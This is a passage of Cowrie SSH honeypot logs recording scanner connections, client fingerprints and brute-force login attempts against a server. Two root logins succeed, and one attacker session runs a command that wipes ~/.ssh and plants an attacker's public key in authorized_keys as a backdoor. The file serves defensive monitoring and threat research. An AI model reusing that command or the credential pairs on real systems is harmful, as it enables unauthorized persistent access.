dsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:59:55.213802Z","src_ip":"212.227.235.229","session":"132d17f4f504"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:59:55.939328Z","src_ip":"212.227.235.229","session":"132d17f4f504"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:59:56.101684Z","src_ip":"212.227.235.229","session":"c2bc7e4a976b"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:59:56.115111Z","src_ip":"212.227.235.229","session":"132d17f4f504"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":36674,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b5f0186e743","protocol":"ssh","message":"New connection: 134.199.174.250:36674 (1.2.3.4:22) [session: 3b5f0186e743]","sensor":"my-vps","timestamp":"2025-09-08T13:00:11.064607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:00:11.065366Z","src_ip":"134.199.174.250","session":"3b5f0186e743"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:00:11.355940Z","src_ip":"134.199.174.250","session":"3b5f0186e743"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234","message":"login attempt [test/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T13:00:12.265104Z","src_ip":"134.199.174.250","session":"3b5f0186e743"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:00:13.753956Z","src_ip":"134.199.174.250","session":"3b5f0186e743"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":54640,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f0a9751c829","protocol":"ssh","message":"New connection: 139.59.14.27:54640 (1.2.3.4:22) [session: 2f0a9751c829]","sensor":"my-vps","timestamp":"2025-09-08T13:00:24.345421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:00:24.346769Z","src_ip":"139.59.14.27","session":"2f0a9751c829"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36407,"dst_ip":"1.2.3.4","dst_port":23,"session":"9366d66b24c8","protocol":"telnet","message":"New connection: 212.227.235.229:36407 (1.2.3.4:23) [session: 9366d66b24c8]","sensor":"my-vps","timestamp":"2025-09-08T13:00:24.489385Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:00:24.705350Z","src_ip":"139.59.14.27","session":"2f0a9751c829"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42104,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae35180cd6f0","protocol":"ssh","message":"New connection: 212.227.235.229:42104 (1.2.3.4:22) [session: ae35180cd6f0]","sensor":"my-vps","timestamp":"2025-09-08T13:00:25.450831Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:00:25.451737Z","src_ip":"212.227.235.229","session":"ae35180cd6f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:00:25.724450Z","src_ip":"212.227.235.229","session":"ae35180cd6f0"}
{"eventid":"cowrie.login.failed","username":"testing","password":"1234567890","message":"login attempt [testing/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T13:00:26.184618Z","src_ip":"139.59.14.27","session":"2f0a9751c829"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51102,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e822d1aef9a","protocol":"ssh","message":"New connection: 212.227.235.229:51102 (1.2.3.4:22) [session: 9e822d1aef9a]","sensor":"my-vps","timestamp":"2025-09-08T13:00:26.193614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:00:26.194458Z","src_ip":"212.227.235.229","session":"9e822d1aef9a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:00:26.486717Z","src_ip":"212.227.235.229","session":"9e822d1aef9a"}
{"eventid":"cowrie.login.failed","username":"portal","password":"qwerty","message":"login attempt [portal/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-08T13:00:26.866555Z","src_ip":"212.227.235.229","session":"ae35180cd6f0"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:00:27.567726Z","src_ip":"139.59.14.27","session":"2f0a9751c829"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"password","message":"login attempt [nagios/password] failed","sensor":"my-vps","timestamp":"2025-09-08T13:00:27.699193Z","src_ip":"212.227.235.229","session":"9e822d1aef9a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:00:28.142130Z","src_ip":"212.227.235.229","session":"ae35180cd6f0"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:00:28.993010Z","src_ip":"212.227.235.229","session":"9e822d1aef9a"}
{"eventid":"cowrie.session.closed","duration":12.893429517745972,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:00:37.382741Z","src_ip":"212.227.235.229","session":"9366d66b24c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50906,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed466a8a9bc0","protocol":"ssh","message":"New connection: 212.227.235.229:50906 (1.2.3.4:22) [session: ed466a8a9bc0]","sensor":"my-vps","timestamp":"2025-09-08T13:00:37.821827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:00:37.822749Z","src_ip":"212.227.235.229","session":"ed466a8a9bc0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:00:37.953583Z","src_ip":"212.227.235.229","session":"ed466a8a9bc0"}
{"eventid":"cowrie.login.success","username":"root","password":"Hello1234","message":"login attempt [root/Hello1234] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:00:38.518069Z","src_ip":"212.227.235.229","session":"ed466a8a9bc0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:00:38.830871Z","src_ip":"212.227.235.229","session":"ed466a8a9bc0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:00:38.831534Z","src_ip":"212.227.235.229","session":"ed466a8a9bc0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:00:38.832574Z","src_ip":"212.227.235.229","session":"ed466a8a9bc0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:00:38.964693Z","src_ip":"212.227.235.229","session":"ed466a8a9bc0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:00:39.287282Z","src_ip":"212.227.235.229","session":"ed466a8a9bc0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:00:39.288031Z","src_ip":"212.227.235.229","session":"ed466a8a9bc0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:00:39.424811Z","src_ip":"212.227.235.229","session":"ed466a8a9bc0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:00:39.425777Z","src_ip":"212.227.235.229","session":"ed466a8a9bc0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51580,"dst_ip":"1.2.3.4","dst_port":22,"session":"986add7cac05","protocol":"ssh","message":"New connection: 212.227.235.229:51580 (1.2.3.4:22) [session: 986add7cac05]","sensor":"my-vps","timestamp":"2025-09-08T13:00:39.551910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:00:39.552702Z","src_ip":"212.227.235.229","session":"986add7cac05"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:00:39.683340Z","src_ip":"212.227.235.229","session":"986add7cac05"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:00:40.247271Z","src_ip":"212.227.235.229","session":"986add7cac05"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":49924,"dst_ip":"1.2.3.4","dst_port":22,"session":"91f744737bbc","protocol":"ssh","message":"New connection: 134.199.174.250:49924 (1.2.3.4:22) [session: 91f744737bbc]","sensor":"my-vps","timestamp":"2025-09-08T13:00:41.244415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:00:41.272979Z","src_ip":"134.199.174.250","session":"91f744737bbc"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:00:41.379278Z","src_ip":"212.227.235.229","session":"986add7cac05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52304,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2c781d95915","protocol":"ssh","message":"New connection: 212.227.235.229:52304 (1.2.3.4:22) [session: b2c781d95915]","sensor":"my-vps","timestamp":"2025-09-08T13:00:41.507766Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:00:41.509653Z","src_ip":"212.227.235.229","session":"b2c781d95915"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:00:41.586385Z","src_ip":"134.199.174.250","session":"91f744737bbc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:00:41.639252Z","src_ip":"212.227.235.229","session":"b2c781d95915"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:00:42.200763Z","src_ip":"212.227.235.229","session":"b2c781d95915"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:00:42.331520Z","src_ip":"212.227.235.229","session":"b2c781d95915"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:00:42.332547Z","src_ip":"212.227.235.229","session":"ed466a8a9bc0"}
{"eventid":"cowrie.login.failed","username":"test","password":"123","message":"login attempt [test/123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:00:43.034882Z","src_ip":"134.199.174.250","session":"91f744737bbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:00:43.500983Z","src_ip":"212.227.235.229","session":"83c9bb8cbc7c"}
